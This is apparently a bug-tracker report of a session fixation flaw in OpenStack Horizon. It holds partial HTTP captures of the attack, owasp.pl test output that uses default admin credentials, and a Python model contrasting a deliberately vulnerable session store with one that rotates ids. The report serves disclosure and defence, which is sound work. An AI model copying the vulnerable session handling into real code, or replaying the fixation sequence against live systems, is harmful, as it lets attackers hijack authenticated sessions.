session fixation vulnerability
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
OpenStack Dashboard (Horizon) | Fix Released | Critical | Paul McMillan |
Essex | Fix Released | Critical | Paul McMillan |
Bug Description
Hi,
It looks like openstack-dashboard is vulnerable to a session fixation attack. Here is an HTTP dialog:
1. eviled Login with no Cookie header
-------
POST http://
User-Agent: Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.10.229 Version/11.61
Host: test
Accept: text/html, application/
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;
Accept-Encoding: gzip, deflate
Referer: http://
Cookie: csrftoken=
sessionid=
Proxy-Connection: Keep-Alive
Content-length: 141
Content-Type: application/
csrfmiddlewaret
2. eviled gets response with sessionid Cookie
-------
HTTP/1.1 302 FOUND
Date: Wed, 21 Mar 2012 15:59:09 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Vary: Accept-
Location: http://
Content-Language: en
Set-Cookie: sessionid=
Content-length: 0
Connection: close
Content-Type: text/html; charset=utf-8
3. eviled logout
-----------------
GET http://
User-Agent: Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.10.229 Version/11.61
Host: test
Accept: text/html, application/
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;
Accept-Encoding: gzip, deflate
Referer: http://
Cookie: sessionid=
csrftoken=
Pragma: no-cache
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
4. Admin Login:
---------------
GET http://
User-Agent: Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.10.229 Version/11.61
Host: test
Accept: text/html, application/
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;
Accept-Encoding: gzip, deflate
Referer: http://
Cookie: sessionid=
csrftoken=
Pragma: no-cache
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
5. Admin request sets the same CSRF token and sessionid Cookie
-------
HTTP/1.1 200 OK
Date: Wed, 21 Mar 2012 15:59:13 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Vary: Cookie,
Content-Language: en
Set-Cookie: csrftoken=
20-Mar-2013 15:59:13 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid=
Connection: close
Content-Type: text/html; charset=utf
Changed in horizon:
milestone: none → folsom-1
status: Confirmed → Fix Committed
Changed in horizon:
status: Fix Committed → Fix Released
Changed in horizon:
milestone: folsom-1 → 2012.2
The following output is from the owasp.pl tool of my test-suite [1].
thomas:~/test-suite> ./owasp.pl output=short openstack_horizon_lpd978896.ini
[...removed output for session_fixation_public()...]
DBG: 003::session_fixation_private(http://test:80/auth/login/, Login&username=admin&password=openstack)
Login&username=eviled&password=eviled'
003::session_fixation_private: cookie = a917fb9e5c35b03b690aa24ed1815a16; Path=/'
Login&username=admin&password=openstack'
003::session_fixation_private: session cookie = a917fb9e5c35b03b690aa24ed1815a16; Path=/'
003::session_fixation_private: new cookie = a917fb9e5c35b03b690aa24ed1815a16; Path=/'
003::session_fixation_private: logged out
003::session_fixation_private: CWE-384 (Session Fixation): code test:80/auth/login/ )')
OWASP_SM_
POST, method=
DBG: 1. try to login with 'method=
(attacker)
DBG: OWASP_SM_
'sessionid=
DBG: 2. try to login with 'method=
(victim)
DBG: OWASP_SM_
'sessionid=
DBG: OWASP_SM_
'sessionid=
DBG: 3. compare cookie 'sessionid'
DBG: OWASP_SM_
=====> OWASP_SM_
= 1 (msg = 'FAIL:Vulnerable to Session Fixation Attack by authenticated users
(http://
2 tests in 2 secs.
[1] https://gitorious.org/test-suite/test-suite
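The five-step dialog in the bug description and the three-step owasp.pl check in the comment above (attacker logs in, logs out, victim logs in carrying the attacker's cookie, compare `sessionid`) are easy to model against a server-side session store. The following is an added example written for this page, not Horizon code and not part of the test-suite: a toy `SessionStore` with a `rotate_on_auth` switch that reproduces the reported behaviour (the same `sessionid` survives logout and the admin's login) and the standard mitigation (a freshly minted id on every authentication state change, which is what Django's `login()` does through `session.cycle_key()`). The class and function names are constructed for the example; the user names `eviled` and `admin` are the ones from the report.

```python
"""Toy model of the reported session-fixation dialog: vulnerable vs rotating store."""
import secrets


class SessionStore:
    """Minimal server-side session table keyed by the value of the sessionid cookie.

    rotate_on_auth=False reproduces the behaviour in the bug report: the id issued
    before authentication survives logout and the next login, so whoever knows it
    shares the admin's session. rotate_on_auth=True is the standard mitigation:
    every change of authentication state gets a freshly minted id.
    """

    def __init__(self, rotate_on_auth):
        self.rotate_on_auth = rotate_on_auth
        self._sessions = {}  # sid -> session data

    def _new_session(self):
        # 128-bit random id from the OS CSPRNG; never derived from client input.
        sid = secrets.token_hex(16)
        self._sessions[sid] = {}
        return sid

    def _resolve(self, cookie_sid):
        """Map an incoming Cookie: sessionid=... to a stored session.

        Unknown or missing ids are never adopted; a fresh server-minted id is
        used instead, so a client cannot pick its own session id either."""
        if cookie_sid in self._sessions:
            return cookie_sid
        return self._new_session()

    def login(self, cookie_sid, user):
        """Authenticate and return the sid to send back in Set-Cookie."""
        sid = self._resolve(cookie_sid)
        if self.rotate_on_auth:
            # Mitigation: drop the pre-auth id and move the data to a new one
            # (what Django's login() does via session.cycle_key()).
            data = self._sessions.pop(sid)
            sid = self._new_session()
            self._sessions[sid] = data
        self._sessions[sid]["user"] = user
        return sid

    def logout(self, cookie_sid):
        """End the session and return the sid to send back in Set-Cookie."""
        sid = self._resolve(cookie_sid)
        if self.rotate_on_auth:
            # Mitigation: destroy server-side state; a new anonymous id replaces it.
            del self._sessions[sid]
            return self._new_session()
        # Vulnerable: the user is cleared but the id stays valid and reusable.
        self._sessions[sid].pop("user", None)
        return sid

    def whoami(self, cookie_sid):
        """User bound to a sid, or None (what the holder of that cookie can reach)."""
        return self._sessions.get(cookie_sid, {}).get("user")


def session_fixation_check(store):
    """Replay the report's dialog against a store and return what the test observed.

    Steps mirror the bug description: (1-2) attacker logs in without a cookie and
    is issued a sessionid, (3) attacker logs out, (4-5) victim logs in presenting
    the attacker's cookie. The store is vulnerable when the victim's authenticated
    session is reachable through the cookie value the attacker already knows.
    """
    attacker_sid = store.login(None, "eviled")        # steps 1-2
    planted_sid = store.logout(attacker_sid)          # step 3
    victim_sid = store.login(planted_sid, "admin")    # steps 4-5
    return {
        "cookie_reused": victim_sid == planted_sid,   # owasp.pl step 3: compare sessionid
        "vulnerable": store.whoami(planted_sid) == "admin",
    }


if __name__ == "__main__":
    for rotate in (False, True):
        result = session_fixation_check(SessionStore(rotate_on_auth=rotate))
        print("rotate_on_auth=%s -> %s" % (rotate, result))
```

The same replay doubles as a regression test for a deployment: run the three steps against a staging login endpoint and fail the build if the `sessionid` returned to the second login equals the one planted before it. Note that rotating on login alone is not enough if logout leaves the old id valid, which is why `logout()` also destroys the server-side entry in the hardened branch.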